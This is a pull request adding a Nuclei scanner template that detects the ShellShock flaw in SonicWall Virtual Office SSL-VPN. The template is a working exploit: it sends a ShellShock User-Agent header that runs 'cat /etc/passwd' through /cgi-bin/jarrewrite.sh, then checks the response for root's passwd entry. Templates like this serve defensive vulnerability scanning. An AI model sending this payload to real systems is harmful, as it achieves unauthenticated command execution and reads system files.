### PR TITLE
Added/sonicwall-shellshock-vulnerability

### DIFF
--- a/sonicwall-shellshock-vulnerability.yaml
+++ b/sonicwall-shellshock-vulnerability.yaml
@@ -1,0 +1,22 @@
+id: sonicwall-shellshock-vulnerability
+
+info:
+  name: SonicWall ShellShock Vulnerability
+  author: umityn
+  severity: high
+  description: SonicWall "Virtual Office" SSL-VPN Products (versions 8.0.0.0 and lower) contain a Bash version that is vulnerable to the ShellShock exploit and are therefore vulnerable to unauthenticated remote code execution via the /cgi-bin/jarrewrite.sh endpoint.
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/jarrewrite.sh"
+
+    headers:
+      User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
+      Content-Type: "application/x-www-form-urlencoded"
+    matchers:
+      - type: word
+        words:
+          - "root:x:0:0:root:"
+        part: body
+

--- a/sonicwall-shellshock-vulnerability.yaml
+++ b/sonicwall-shellshock-vulnerability.yaml
@@ -19,4 +19,3 @@ http:
         words:
           - "root:x:0:0:root:"
         part: body
-


### PR DESCRIPTION
### Template / PR Information

SonicWall "Virtual Office" SSL-VPN Products (versions 8.0.0.0 and lower) contain a Bash version that is vulnerable to the ShellShock exploit and are therefore vulnerable to unauthenticated remote code execution via the /cgi-bin/jarrewrite.sh endpoint.

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template Validation

I've validated this template locally?
- [X ] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)